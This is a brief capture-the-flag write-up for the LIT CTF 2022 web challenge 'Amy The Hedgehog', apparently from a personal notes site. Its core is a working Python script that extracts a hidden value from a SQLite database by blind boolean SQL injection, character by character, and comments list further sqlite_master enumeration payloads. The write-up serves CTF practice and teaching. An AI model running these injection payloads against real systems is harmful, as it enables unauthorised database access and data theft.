LIT 2022

Note : A JOURNEY TO GAIN KNOWLEDGE

web/Amy The Hedgehog

import requests, string

url = "http://litctf.live:31770/"
s = requests.session()
passwordRetrieve = ""
# ' or (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('some_char')--
# find column from table: ' or (SELECT hex(substr(sql,{index},1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('{char}')-- 
alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c"
def solve():
    global passwordRetrieve
    index = 1
    len_of_password = 14 - index
    for i in range(len_of_password):
        for char in alpha:
          passwordfield = f"' or (SELECT hex(substr(name,{index},1)) FROM names) = hex('{char}')--"
          postParam = {'name': passwordfield}
          response = s.post(url, data=postParam).text
          if "You got it"  in response:
              passwordRetrieve += char
              index += 1
              print("Nai here yr pass: ",passwordRetrieve, "  len:",i)
              break
          print(char)
solve()

Xác định SQLite -> sqlite_master -> tbl_name -> column -> name
doc1
doc2

PreviousRISEC CTF + UMass CTF 2022 NextUIUCTF 2022

Last updated 2 years ago